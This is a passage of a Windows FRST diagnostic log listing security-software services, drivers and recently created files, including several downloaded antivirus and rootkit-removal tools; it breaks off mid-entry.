R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-10-03] (Symantec Corporation)
R3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-10-03] (Symantec Corporation)
S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-10-03] (Symantec Corporation)
R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [874784 2016-04-21] (McAfee, Inc.)
R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [15736 2016-04-21] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-04-21] (McAfee, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20161128.001\BHDrvx64.sys [1874136 2016-11-07] (Symantec Corporation)
R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-10-03] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-11-16] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20161129.011\IDSvia64.sys [1012952 2016-10-26] (Symantec Corporation)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-11-05] (LogMeIn, Inc.)
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161130.002\ENG64.SYS [138456 2016-11-30] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161130.002\EX64.SYS [2148056 2016-11-30] (Symantec Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-08-18] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2015-08-18] (NVIDIA Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-10-03] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-10-03] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-10-03] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-10-03] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-10-03] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2016-11-16] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-10-03] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-10-03] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2016-11-16] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)
2016-11-30 04:42 - 2016-11-30 04:44 - 00000000 ____D C:\Users\cjerald\Doctor Web 2016-11-23 14:52 - 2016-11-23 14:52 - 00082894 _____ C:\Users\cjerald\Downloads\Waiver of Lien-Blank form Green Space (2).pdf 2016-11-23 14:52 - 2016-11-23 14:52 - 00082894 _____ C:\Users\cjerald\Downloads\Waiver of Lien-Blank form Green Space (1).pdf 2016-11-23 14:31 - 2016-11-23 14:31 - 00082894 _____ C:\Users\cjerald\Downloads\Waiver of Lien-Blank form Green Space.pdf 2016-11-22 00:42 - 2016-11-22 00:42 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task 2016-11-21 09:28 - 2016-11-30 04:44 - 00000000 ____D C:\Users\cjerald\AppData\Local\322148 2016-11-19 16:32 - 2016-12-01 04:41 - 00000000 ____D C:\FRST 2016-11-18 16:04 - 2016-11-18 19:25 - 00000000 ____D C:\Users\cjerald\Pavark 2016-11-18 15:23 - 2016-11-19 16:30 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2016-11-18 15:20 - 2016-11-18 15:48 - 00000000 ____D C:\Users\cjerald\Downloads\Rootkit Removers 2016-11-16 22:11 - 2016-11-16 22:11 - 06449720 _____ C:\Users\cjerald\Downloads\install_backblaze.exe 2016-11-16 22:08 - 2016-11-18 11:02 - 00000000 ____D C:\Program Files\MyDefrag v4.3.1 2016-11-16 22:08 - 2016-11-16 22:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyDefrag v4.3.1 2016-11-16 22:08 - 2010-05-21 12:11 - 01147392 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.exe 2016-11-16 22:08 - 2010-05-21 12:11 - 00485376 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.scr 2016-11-16 22:07 - 2016-11-16 22:07 - 02082630 _____ (J.C. 
Kessels ) C:\Users\cjerald\Downloads\MyDefrag-v4.3.1.exe 2016-11-16 21:31 - 2016-11-16 21:31 - 00110424 _____ C:\Users\clayton\AppData\Local\GDIPFONTCACHEV1.DAT 2016-11-16 21:19 - 2016-11-16 21:19 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA Corporation 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Windows Small Business Server 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Adobe 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Symantec 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\LogMeIn 2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Google 2016-11-16 21:17 - 2016-11-16 21:17 - 00000000 ____D C:\Users\clayton\AppData\Local\VirtualStore 2016-11-16 07:58 - 2016-11-16 07:58 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll 2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\Program Files (x86)\Java 2016-11-16 07:54 - 2016-11-16 07:54 - 00000000 ____D C:\Users\cjerald\AppData\Roaming\Sun 2016-11-16 07:51 - 2016-11-16 07:51 - 00737344 _____ (Oracle Corporation) C:\Users\cjerald\Downloads\chromeinstall-8u111.exe 2016-11-16 02:55 - 2016-11-16 02:55 - 00000000 ____D C:\ProgramData\Sophos 2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos 2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\Program Files (x86)\Sophos 2016-11-16 02:50 - 2016-11-16 02:51 - 155406624 _____ (Sophos Limited) C:\Users\cjerald\Downloads\Sophos Virus Removal Tool.exe 2016-11-16 00:34 - 2016-11-16 00:34 - 00448512 _____ (OldTimer Tools) C:\Users\cjerald\Downloads\TFC.exe 2016-11-15 13:32 - 2016-11-15 
15:03 - 00044360 __RSH C:\ProgramData\ntuser.pol 2016-11-15 02:13 - 2016-08-22 14:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys 2016-11-15 02:12 - 2016-11-15 02:12 - 02527376 _____ (Trend Micro Inc.) C:\Users\cjerald\Downloads\HousecallLauncher64 (1).exe 2016-11-14 19:40 - 2016-11-14 19:40 - 00000000 ____D C:\Users\cjerald\AppData\Local\ESET 2016-11-14 19:39 - 2016-11-14 19:39 - 06761600 _____ (ESET spol. s r.o.) C:\Users\cjerald\Downloads\esetonlinescanner_enu.exe 2016-11-14 19:07 - 2016-11-14 19:07 - 00023783 _____ C:\ComboFix.txt 2016-11-14 13:00 - 2016-10-07 18:25 - 00002291 ____N C:\Windows\system32\SetupBD.din 2016-11-14 12:55 - 2016-11-14 12:55 - 81335920 _____ C:\Users\cjerald\Downloads\PROWinx64.exe 2016-11-14 12:43 - 2016-11-14 12:43 - 00362144 _____ (Roadkil.Net ) C:\Users\cjerald\Downloads\CommTest.exe 2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roadkil.Net 2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\Program Files (x86)\Roadkil.Net 2016-11-09 15:50 - 2016-11-02 10:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll 2016-11-09 15:50 - 2016-11-02 10:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll 2016-11-09 15:50 - 2016-11-02 10:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll 2016-11-09 15:50 - 2016-11-02 10:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll 2016-11-09 15:50 - 2016-11-02 10:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll 2016-11-09 15:50 - 2016-11-02 10:16 - 00010240 _____ (Microsoft 
Corporation) C:\Windows\SysWOW64\dciman32.dll 2016-11-09 15:50 - 2016-11-02 09:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll 2016-11-09 15:50 - 2016-10-27 22:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2016-11-09 15:50 - 2016-10-27 22:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2016-11-09 15:50 - 2016-10-27 14:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-11-09 15:50 - 2016-10-27 14:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2016-11-09 15:50 - 2016-10-27 13:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2016-11-09 15:50 - 2016-10-27 13:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-11-09 15:50 - 2016-10-27 13:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2016-11-09 15:50 - 2016-10-27 13:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-11-09 15:50 - 2016-10-27 13:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2016-11-09 15:50 - 2016-10-27 13:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-11-09 15:50 - 2016-10-27 13:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-11-09 15:50 - 2016-10-27 13:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2016-11-09 15:50 - 2016-10-27 13:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-11-09 15:50 - 2016-10-27 13:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-11-09 15:50 - 2016-10-27 13:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2016-11-09 15:50 - 2016-10-27 13:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-11-09 15:50 - 2016-10-27 13:37 - 00114688 _____ (Microsoft Corporation) 
C:\Windows\system32\ieetwcollector.exe 2016-11-09 15:50 - 2016-10-27 13:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-11-09 15:50 - 2016-10-27 13:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2016-11-09 15:50 - 2016-10-27 13:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-11-09 15:50 - 2016-10-27 13:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-11-09 15:50 - 2016-10-27 13:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2016-11-09 15:50 - 2016-10-27 13:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll 2016-11-09 15:50 - 2016-10-27 13:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2016-11-09 15:50 - 2016-10-27 13:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-11-09 15:50 - 2016-10-27 13:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-11-09 15:50 - 2016-10-27 13:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll 2016-11-09 15:50 - 2016-10-27 12:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2016-11-09 15:50 - 2016-10-27 12:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-11-09 15:50 - 2016-10-27 12:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2016-11-09 15:50 - 2016-10-27 12:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-11-09 15:50 - 2016-10-27 12:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2016-11-09 15:50 - 2016-10-27 12:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-11-09 15:50 - 2016-10-27 12:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-11-09 15:50 - 2016-10-27 12:03 - 01543680 _____ (Microsoft 
Corporation) C:\Windows\system32\urlmon.dll 2016-11-09 15:50 - 2016-10-27 11:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2016-11-09 15:50 - 2016-10-27 10:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-11-09 15:50 - 2016-10-25 10:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-11-09 15:50 - 2016-10-22 12:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-11-09 15:50 - 2016-10-22 12:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2016-11-09 15:50 - 2016-10-22 12:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2016-11-09 15:50 - 2016-10-22 12:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-11-09 15:50 - 2016-10-22 12:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-11-09 15:50 - 2016-10-22 12:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2016-11-09 15:50 - 2016-10-22 12:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-11-09 15:50 - 2016-10-22 12:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-11-09 15:50 - 2016-10-22 12:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2016-11-09 15:50 - 2016-10-22 12:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-11-09 15:50 - 2016-10-22 12:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-11-09 15:50 - 2016-10-22 12:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-11-09 15:50 - 2016-10-22 12:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2016-11-09 15:50 - 2016-10-22 12:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-11-09 15:50 - 2016-10-22 12:04 - 00060416 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2016-11-09 15:50 - 2016-10-22 12:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll 2016-11-09 15:50 - 2016-10-22 11:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2016-11-09 15:50 - 2016-10-22 11:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-11-09 15:50 - 2016-10-22 11:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-11-09 15:50 - 2016-10-22 11:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll 2016-11-09 15:50 - 2016-10-22 11:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll 2016-11-09 15:50 - 2016-10-22 11:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-11-09 15:50 - 2016-10-22 11:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-11-09 15:50 - 2016-10-22 11:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-11-09 15:50 - 2016-10-22 11:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2016-11-09 15:50 - 2016-10-22 11:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-11-09 15:50 - 2016-10-22 11:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-11-09 15:50 - 2016-10-22 11:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-11-09 15:50 - 2016-10-22 11:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2016-11-09 15:50 - 2016-10-15 10:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll 2016-11-09 15:50 - 2016-10-15 10:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll 2016-11-09 15:50 - 2016-10-15 10:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll 2016-11-09 15:50 - 2016-10-15 10:13 - 00084480 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\INETRES.dll 2016-11-09 15:50 - 2016-10-11 10:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys 2016-11-09 15:50 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME 2016-11-09 15:50 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll 2016-11-09 15:50 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2016-11-09 15:50 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll 2016-11-09 15:50 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime 2016-11-09 15:50 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME 2016-11-09 15:50 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll 2016-11-09 15:50 - 2016-10-11 10:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL 2016-11-09 15:50 - 2016-10-11 10:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll 2016-11-09 15:50 - 
2016-10-11 10:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime 2016-11-09 15:50 - 2016-10-11 10:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime 2016-11-09 15:50 - 2016-10-11 08:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll 2016-11-09 15:50 - 2016-10-11 08:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll 2016-11-09 15:50 - 2016-10-10 10:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2016-11-09 15:50 - 2016-10-10 10:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2016-11-09 15:50 - 2016-10-10 10:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2016-11-09 15:50 - 2016-10-10 10:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2016-11-09 15:50 - 2016-10-10 10:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2016-11-09 15:50 - 2016-10-10 10:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 
00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll 2016-11-09 15:50 - 2016-10-10 10:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00172032 _____ (Microsoft 
Corporation) C:\Windows\SysWOW64\wdigest.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll 2016-11-09 15:50 - 2016-10-10 10:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2016-11-09 15:50 - 2016-10-10 10:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe 2016-11-09 15:50 - 2016-10-10 09:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2016-11-09 15:50 - 2016-10-10 09:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys 2016-11-09 15:50 - 2016-10-10 09:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys 2016-11-09 15:50 - 2016-10-10 09:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe 2016-11-09 15:50 - 2016-10-10 09:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe 2016-11-09 15:50 - 2016-10-10 09:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll 2016-11-09 15:50 - 2016-10-07 10:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2016-11-09 15:50 - 2016-10-07 10:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-11-09 15:50 - 2016-10-07 10:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2016-11-09 15:50 - 2016-10-07 10:35 - 01732864 _____ (Microsoft 
